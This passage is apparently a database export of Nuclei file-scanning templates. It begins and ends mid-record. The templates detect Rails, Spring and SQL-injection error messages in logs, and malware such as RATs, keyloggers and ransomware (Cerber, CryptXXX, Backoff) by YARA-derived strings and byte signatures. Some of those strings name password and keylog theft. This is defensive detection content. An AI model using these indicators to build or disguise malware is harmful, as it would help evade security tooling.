file,logs,ruby,rails\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'ActionController\\:\\:InvalidAuthenticityToken'\n - 'ActionController::InvalidCrossOriginRequest'\n - 'ActionController::MethodNotAllowed'\n - 'ActionController::BadRequest'\n - 'ActionController::ParameterMissing'\n\n# digest: 4b0a00483046022100a1bd834e4286e12eca1f7399ab94cbe5050b0f8952abf7b30c664b22697e4df2022100a86690ed53bb1a4ac2537909bd5efb6ba95efb245ba9b746044f7bf4c958b2a5:922c64590222798bb761d5b6d8e72950\n", "hash": "ae916e5caaf43ab2478ef58623a521cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6b" }, "name": "spring-framework-exceptions.yaml", "content": "id: spring-framework-exceptions\n\ninfo:\n name: Spring Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts\n reference:\n - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html\n tags: file,logs,spring\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'AccessDeniedException'\n - 'CsrfException'\n - 'InvalidCsrfTokenException'\n - 'MissingCsrfTokenException'\n - 'CookieTheftException'\n - 'InvalidCookieException'\n - 'RequestRejectedException'\n\n# digest: 4a0a0047304502206ba4ce83107c5c02e084ca1a2743a346e3e41dbc727e3470f6519aa3e24fc9950221009c39b68664e85289134c1c58072a5086f3878c01ec27503b82984401a1d9ac0c:922c64590222798bb761d5b6d8e72950\n", "hash": "eb79b43c7cc8ca64f11f7cc2e8676b6b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6c" }, "name": "suspicious-sql-error-messages.yaml", "content": "id: suspicious-sql-error-messages\n\ninfo:\n name: SQL - Error Messages\n author: geeknik\n severity: critical\n description: SQL error messages that indicate probing for an injection attack were detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cwe-id: CWE-89\n tags: file,logs,sql,error\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: oracle\n part: body\n regex:\n - 'quoted string not properly terminated'\n\n - type: regex\n name: mysql\n part: body\n regex:\n - 'You have an error in your SQL syntax'\n\n - type: regex\n name: sql_server\n part: body\n regex:\n - 'Unclosed quotation mark'\n\n - type: regex\n name: sqlite\n part: body\n regex:\n - 'near \\\"\\*\\\"\\: syntax error'\n - 'SELECTs to the left and right of UNION do not have the same number of result columns'\n\n# digest: 490a0046304402201d5d530c0efe89b2780c5a407266a640c4f3ddc7ccf1c39f27855bb9675b456e022031ffc06367293118a8f9c8e3ce0c116256961abbea5b0761b4954f7070fa6349:922c64590222798bb761d5b6d8e72950\n", "hash": "d7f2f6b6b5cdca5f244f2079465d019e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6d" }, "name": "aar-malware.yaml", "content": "id: aar-malware\n\ninfo:\n name: AAR Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Hashtable\"\n - \"get_IsDisposed\"\n - \"TripleDES\"\n - \"testmemory.FRMMain.resources\"\n - \"$this.Icon\"\n - \"{11111-22222-20001-00001}\"\n - \"@@@@@\"\n condition: and\n\n# digest: 4b0a00483046022100c3a9a57d91e28a49a5e9b6b0d1cb748be88c636110c9eb9482a51fde9f35266d022100a6f13bde1916d01e42c6dca9544ffdb9fe475e393657f82d753701898621b765:922c64590222798bb761d5b6d8e72950\n", "hash": "76353ea41525459d33ae19d239dc9732", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6e" }, "name": "adzok-malware.yaml", "content": "id: adzok-malware\n\ninfo:\n name: Adzok Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"resources/icono.pngPK\"\n condition: and\n\n# digest: 4a0a00473045022078baa991694a29ddb0910faad83bbe2d56a67739ab974b6a43eab7e494ae29b302210090fb44202dfbca4ef591b7d55b2c10ddcff8a47737a46de9491c838a7263be77:922c64590222798bb761d5b6d8e72950\n", "hash": "072faa4cec83d8be6e171351b138eab6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6f" }, "name": "alfa-malware.yaml", "content": "id: alfa-malware\n\ninfo:\n name: Alfa Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"8B0C9781E1FFFF000081F919040000740F81F9\"\n - \"220400007407423BD07CE2EB02\"\n condition: and\n\n# digest: 4a0a0047304502206fd1a4e1b8a904da814aa19c10249a96a98fa29233f922bab161e3b93d413a00022100a147f5f3a192423bda7f022ad0bb3dd91d1a8d321d9a6687c9da0ca35ce98476:922c64590222798bb761d5b6d8e72950\n", "hash": "13f26d26bb2d4c9f49cbbaa9a3769841", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d70" }, "name": "alienspy-malware.yaml", "content": "id: alienspy-malware\n\ninfo:\n name: AlienSpy Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF/MANIFEST.MF\"\n - \"ePK\"\n - \"kPK\"\n - \"config.ini\"\n - \"password.ini\"\n - \"stub/stub.dll\"\n - \"c.dat\"\n condition: and\n\n# digest: 4b0a0048304602210099bae7391b6cf2278da97789c2cb44af6ea6a4983b92016e59a3456fa593335f022100cbc010d1b5dff13672cb5c07314431e7f74d24f8bc0c2035185d3c08269a3be3:922c64590222798bb761d5b6d8e72950\n", "hash": "38fab9b3febd62f4672ed0038fc66016", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d71" }, "name": "alina-malware.yaml", "content": "id: alina-malware\n\ninfo:\n name: Alina Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Alina v1.0'\n - 'POST'\n - '1[0-2])[0-9]'\n condition: and\n\n# digest: 4b0a00483046022100a267b4decff9664b60695730319caed7c613138a358e3697b3e1b0566b20872c022100cf3ac7fafc2bed1b5d599729fcde42a0ac732f400b015a260b1a493fe8e8c193:922c64590222798bb761d5b6d8e72950\n", "hash": "3dde04a0864236637d14967306529af4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d72" }, "name": "alpha-malware.yaml", "content": "id: alpha-malware\n\ninfo:\n name: Alpha Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"520065006100640020004D0065002000280048006F00770020004400650063\"\n\n# digest: 4a0a004730450221009b5e9aa41a25cb5d9482c691f43bb6f1711b5a6907c684034f43192929520cb20220085710f5e83b940ae1e8defff1687753b6525289356cf579f3108a1a10620b52:922c64590222798bb761d5b6d8e72950\n", "hash": "abca9dd433717ea5b0b7ff53bc149c60", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d73" }, "name": "andromeda-malware.yaml", "content": "id: andromeda-malware\n\ninfo:\n name: Andromeda Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'hsk\\\\ehs\\\\dihviceh\\\\serhlsethntrohntcohurrehem\\\\chsyst'\n\n - type: binary\n binary:\n - \"1C1C1D03494746\"\n\n# digest: 490a0046304402201778cf53991884f7b29706930aec0f8acfce69528e080663a436bdba0b42546a0220636a9eee01a609195564a9f19c89721357a20d1b3460d1beeff7b33b961c74b0:922c64590222798bb761d5b6d8e72950\n", "hash": "2874359d4a79d5172128794c449ae685", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d74" }, "name": "ap0calypse-malware.yaml", "content": "id: ap0calypse-malware\n\ninfo:\n name: Ap0calypse Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Ap0calypse\"\n - \"Sifre\"\n - \"MsgGoster\"\n - \"Baslik\"\n - \"Dosyalars\"\n - \"Injecsiyon\"\n condition: and\n\n# digest: 4a0a004730450221009a4fe2a01a81f0ce6902dff99fd80899a03564015ef45e6a0cf97470115f32b3022027b355be70bb66fb654b7ea8d1cfc34de9d61102a4d5a66f8218b764b4d94897:922c64590222798bb761d5b6d8e72950\n", "hash": "b7ab48258011a23c10d3250f3d9e3cdf", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d75" }, "name": "arcom-malware.yaml", "content": "id: arcom-malware\n\ninfo:\n name: Arcom Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"CVu3388fnek3W(3ij3fkp0930di\"\n - \"ZINGAWI2\"\n - \"clWebLightGoldenrodYellow\"\n - \"Ancestor for '%s' not found\"\n - \"Control-C hit\"\n condition: and\n\n - type: binary\n binary:\n - \"A3242521\"\n\n# digest: 4b0a00483046022100c94af5a498c4235c4290fd509d830c181e05b2915d979c951c297aacd1c24f71022100902af9cda3098593dc1e6f28001eecccd32330b65e6f6329d35bf7e48fb757ea:922c64590222798bb761d5b6d8e72950\n", "hash": "72a97aa0003697b907ec8b73ed96ddb3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d76" }, "name": "arkei-malware.yaml", "content": "id: arkei-malware\n\ninfo:\n name: Arkei Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Arkei'\n - '/server/gate'\n - '/server/grubConfig'\n - '\\\\files\\\\'\n - 'SQLite'\n condition: and\n\n# digest: 4a0a004730450220521d19ffdc72c12b2e9464f1214ef06c4d2b714414ed036d576636a2bfcb8455022100a6fcba94907d58d6ebf858c11440ccc232b30a950ddb1a3bed2eacebeac1e8e8:922c64590222798bb761d5b6d8e72950\n", "hash": "1c489659d857690aadeb5d8c1cc46292", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d77" }, "name": "backoff-malware.yaml", "content": "id: backoff-malware\n\ninfo:\n name: Backoff Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s'\n - '%s @ %s'\n - 'Upload KeyLogs'\n condition: and\n\n# digest: 490a00463044022054816145454972b2358433c84a6671c0caf54ba3365d6f959c77815a082223ce02206908e7c060293d4bfcb9349f78aa7e296b348d407d8098600fa1e839b273350a:922c64590222798bb761d5b6d8e72950\n", "hash": "599e8004247bb4ad65adc055bd5c50b4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d78" }, "name": "bandook-malware.yaml", "content": "id: bandook-malware\n\ninfo:\n name: Bandook Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"aaaaaa1|\"\n - \"aaaaaa2|\"\n - \"aaaaaa3|\"\n - \"aaaaaa4|\"\n - \"aaaaaa5|\"\n - \"%s%d.exe\"\n - \"astalavista\"\n - \"givemecache\"\n - \"%s\\\\system32\\\\drivers\\\\blogs\\\\*\"\n - \"bndk13me\"\n condition: and\n\n# digest: 490a00463044022007979ba459fa852d0b1fd07c059ee0adb0247b99212b122b9f3b6e1e4048588d02205a59508d1df975e27c8120cd265e4c11e535631c16b5be4ca71b9595c4326cc2:922c64590222798bb761d5b6d8e72950\n", "hash": "4d77ff0ba6f7d620764dbdd89ab508c6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d79" }, "name": "basicrat-malware.yaml", "content": "id: basicrat-malware\n\ninfo:\n name: BasicRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara\n tags: malware,file,basicrat\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"HKCU Run registry key applied\"\n - \"HKCU Run registry key failed\"\n - \"Error, platform unsupported.\"\n - \"Persistence successful,\"\n - \"Persistence unsuccessful,\"\n condition: and\n\n# digest: 4a0a00473045022100a3b0720f39037b89cbbc1a8a155cbb1d582662a4fec913439bff2417eab3e603022017b43756edf65a2ecf81c6949c67a80b1ba8de85367ce236c003de0f6f8cfbae:922c64590222798bb761d5b6d8e72950\n", "hash": "02761de420f49eb49f15014fc2c3b4fd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7a" }, "name": "blacknix-malware.yaml", "content": "id: blacknix-malware\n\ninfo:\n name: BlackNix Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"SETTINGS\"\n - \"Mark Adler\"\n - \"Random-Number-Here\"\n - \"RemoteShell\"\n - \"SystemInfo\"\n condition: and\n\n# digest: 4b0a00483046022100d79b2bf6b9813e24be723eb40b017c34bbd91cae5b58e92d923f51257f56d1ed022100e978029b16a82c219c6186d41c114204721f08530e6a919c27b8a37475e29145:922c64590222798bb761d5b6d8e72950\n", "hash": "d93dfe8ac870467e61a3de6dab7aa680", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7b" }, "name": "blackworm-malware.yaml", "content": "id: blackworm-malware\n\ninfo:\n name: Blackworm Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'm_ComputerObjectProvider'\n - 'MyWebServices'\n - 'get_ExecutablePath'\n - 'get_WebServices'\n - 'My.WebServices'\n - 'My.User'\n - 'm_UserObjectProvider'\n - 'DelegateCallback'\n - 'TargetMethod'\n - '000004b0'\n - 'Microsoft Corporation'\n condition: and\n\n# digest: 4a0a004730450220321a9ba25d7190220dfe7a801636bec8dd82300a4da2c00042576a880fd29287022100db2c2eaa880379c8391de61e30836de4b1ac496040c28f59da587259b3c7f089:922c64590222798bb761d5b6d8e72950\n", "hash": "61adb0d6a278dab19b3d8c095156da00", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7c" }, "name": "bluebanana-malware.yaml", "content": "id: bluebanana-malware\n\ninfo:\n name: BlueBanana Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF\"\n - \"config.txt\"\n - \"a/a/a/a/f.class\"\n - \"a/a/a/a/l.class\"\n - \"a/a/a/b/q.class\"\n - \"a/a/a/b/v.class\"\n condition: and\n\n# digest: 4a0a00473045022100fff584f3f17159c1748a0e0d4d2b0ee120b206c7f959c4710c02215ae2aca93202206700d0cf20118e36c252a73fbf0f9d0f2bab421663c347de5e5764537c44d855:922c64590222798bb761d5b6d8e72950\n", "hash": "0c47cf7e41604504fea0f088566c4ba5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7d" }, "name": "bozok-malware.yaml", "content": "id: bozok-malware\n\ninfo:\n name: Bozok Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"getVer\"\n - \"StartVNC\"\n - \"SendCamList\"\n - \"untPlugin\"\n - \"gethostbyname\"\n condition: and\n case-insensitive: true\n\n# digest: 4b0a00483046022100f2c9bd8b2ea4e20d78f05da06c61f06d8e04b10d3278739034fdfda246502739022100cb09d1b5cf17a4e82f48f572ec3da680ce8f891a923d5735eca5b8becaca8fca:922c64590222798bb761d5b6d8e72950\n", "hash": "8ffd40b5f2420c1cbbe0497dbe85dd90", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7e" }, "name": "bublik-malware.yaml", "content": "id: bublik-malware\n\ninfo:\n name: Bublik Malware Detector\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - '636F6E736F6C6173'\n - '636C556E00696E666F2E696E69'\n condition: and\n\n# digest: 4a0a00473045022020ba9de3e2cb03c66cf8a47387eeece28ff22583c7f326a703492241b6828b39022100b1114876a5721a8c80ad0902b80cd0e21cb60edc9cdb30f1bdf4f4c6d87a6753:922c64590222798bb761d5b6d8e72950\n", "hash": "38bd7e14c3cd7f7ac6362c091d1813d3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7f" }, "name": "cap-hookexkeylogger-malware.yaml", "content": "id: cap-hookexkeylogger-malware\n\ninfo:\n name: CAP HookExKeylogger Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"SetWindowsHookEx\"\n - \"WH_KEYBOARD_LL\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: raw\n words:\n - \"SetWindowsHookEx\"\n - \"WH_KEYBOARD\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: raw\n words:\n - \"WH_KEYBOARD\"\n - \"WH_KEYBOARD_LL\"\n condition: and\n case-insensitive: true\n\n# digest: 490a0046304402200f26aeb3ca9df9f4045a64a911f4165e3d2cce3ecd67e137f3b2933a1ad58fdf02200afec8f59a9b9944c13e0480ccca71629e367d03dbe950f02440a6cf9f4a52cf:922c64590222798bb761d5b6d8e72950\n", "hash": "e14de9ed8d2b2b2b0a5b73138cda1f37", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d80" }, "name": "cerber-malware.yaml", "content": "id: cerber-malware\n\ninfo:\n name: Cerber Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara\n tags: malware,file,cerber\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"38oDr5.vbs\"\n - \"8ivq.dll\"\n - \"jmsctls_progress32\"\n condition: and\n\n# digest: 4a0a00473045022100875a7c6d4f7468c6d1b91a1eff6e5d17ddc8253fadf0856b37b4f8ced121f6fe0220184ef1cbe47ccffd9fd29895751c24db364027da486bbf48c8ddd86ce84e89e1:922c64590222798bb761d5b6d8e72950\n", "hash": "fe52408862b742b7bac639c70b570bb5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d81" }, "name": "cerberus-malware.yaml", "content": "id: cerberus-malware\n\ninfo:\n name: Cerberus Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"Ypmw1Syv023QZD\"\n - \"wZ2pla\"\n - \"wBmpf3Pb7RJe\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"cerberus\"\n case-insensitive: true\n\n# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950\n", "hash": "56a652c040b2fac9ccd4d894506db3b6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d82" }, "name": "clientmesh-malware.yaml", "content": "id: clientmesh-malware\n\ninfo:\n name: ClientMesh Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"machinedetails\"\n - \"MySettings\"\n - \"sendftppasswords\"\n - \"sendbrowserpasswords\"\n - \"arma2keyMass\"\n - \"keylogger\"\n condition: and\n\n - type: binary\n binary:\n - \"0000000000000000007E\"\n\n# digest: 4a0a00473045022100ad978f9cce613b41cec0b9bfcbccb89b8e5525ba0f9717e3b68b3c74a0a12588022005886883415cdd79b437a4df3a16fbc34eb2f5d9bc66b400274f379e44fa27c5:922c64590222798bb761d5b6d8e72950\n", "hash": "ce8f4be607626e3dece7aa5c7f1ad205", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d83" }, "name": "crimson-malware.yaml", "content": "id: crimson-malware\n\ninfo:\n name: Crimson Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"com/crimson/PK\"\n - \"com/crimson/bootstrapJar/PK\"\n - \"com/crimson/permaJarMulti/PermaJarReporter$1.classPK\"\n - \"com/crimson/universal/containers/KeyloggerLog.classPK\"\n - \"com/crimson/universal/UploadTransfer.classPK\"\n condition: and\n\n# digest: 4a0a0047304502201aca2f60909bc78a6b817e7ec9f4cc6729f9c7bdebd09dd2a06424bd2e0d9cf9022100a46b5beb11bcdb8be397a0022dd14160bd17e8a8467b600daefd1c205f271319:922c64590222798bb761d5b6d8e72950\n", "hash": "a89e8cabfb019d3848a6f05b52997262", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d84" }, "name": "crunchrat-malware.yaml", "content": "id: crunchrat-malware\n\ninfo:\n name: CrunchRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara\n tags: malware,file,crunchrat\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"command\"\n - \"upload\"\n - \"download\"\n - \"cmd.exe\"\n - \"application/x-www-form-urlencoded\"\n - \"&action=\"\n - \"&secondary=\"\n - \"\"\n - \"\"\n condition: and\n case-insensitive: true\n\n# digest: 4a0a0047304502207f75542fcb07f843be7d316303c3dd5eaa2343dc52f018ffc21a16d11e7e7eed022100dba2448549754113fd319716df8f27825011101f6909f36aa8beed10abfe7e05:922c64590222798bb761d5b6d8e72950\n", "hash": "32000f0afc9d102b7b98ce44c79bcff9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d85" }, "name": "cryptxxx-dropper-malware.yaml", "content": "id: cryptxxx-dropper-malware\n\ninfo:\n name: CryptXXX Dropper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"50653157584346765962486F35\"\n - \"43003A005C0042004900450052005C0051006D006B004E0052004C00460000\"\n condition: and\n\n# digest: 4a0a00473045022100bdc14952eb8408ad1757d3a386ecab4617d7f3e5d4287292e8018aced2e61ede022053c9b5781dafb7dfb014d0e0a018b99ce5e1515a4a8800c254094c90eb65c454:922c64590222798bb761d5b6d8e72950\n", "hash": "be95fc80b61e17c57cdbd8772cedccf9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d86" }, "name": "cryptxxx-malware.yaml", "content": "id: cryptxxx-malware\n\ninfo:\n name: CryptXXX Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"525947404A41595D52000000FFFFFFFF\"\n - \"0600000052594740405A0000FFFFFFFF\"\n - \"0A000000525C4B4D574D424B5C520000\"\n - \"FFFFFFFF0A000000525D575D5A4B4370\"\n - \"3F520000FFFFFFFF06000000524C4141\"\n - \"5A520000FFFFFFFF0A000000525C4B4D\"\n - \"41584B5C57520000FFFFFFFF0E000000\"\n - \"522A5C4B4D574D424B204C4740520000\"\n - \"FFFFFFFF0A000000525E4B5C48424149\"\n - \"5D520000FFFFFFFF05000000524B4847\"\n - \"52000000FFFFFFFF0C000000524D4140\"\n - \"48474920435D475200000000FFFFFFFF\"\n - \"0A000000525E5C41495C4F703F520000\"\n - \"FFFFFFFF0A000000525E5C41495C4F70\"\n - \"3C520000FFFFFFFF0800000052494141\"\n - \"49424B5200000000FFFFFFFF06000000\"\n - \"525A4B435E520000FFFFFFFF08000000\"\n - \"52483A4C4D703F5200000000FFFFFFFF\"\n - \"0A000000524F42425B5D4B703F520000\"\n - \"FFFFFFFF0A000000525E5C41495C4F70\"\n - \"3F520000FFFFFFFF0A000000525E5C41\"\n - \"495C4F703C520000FFFFFFFF09000000\"\n - \"524F5E5E4A4F5A4F52000000FFFFFFFF\"\n - \"0A000000525E5C41495C4F703D520000\"\n - \"FFFFFFFF08000000525E5B4C42474D52\"\n condition: and\n\n# digest: 490a0046304402200be06227894be466ece6600d08b5c21ffe0a1c04d8297f5fd684fc66fa64f0d202203f57a1271be83715b3953f3fcc4fd08dd1d2db57240cfd5fc9a9611008574bf9:922c64590222798bb761d5b6d8e72950\n", "hash": "51eef0bc95b01fdaf494725c4f75628a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d87" }, "name": "cxpid-malware.yaml", "content": "id: 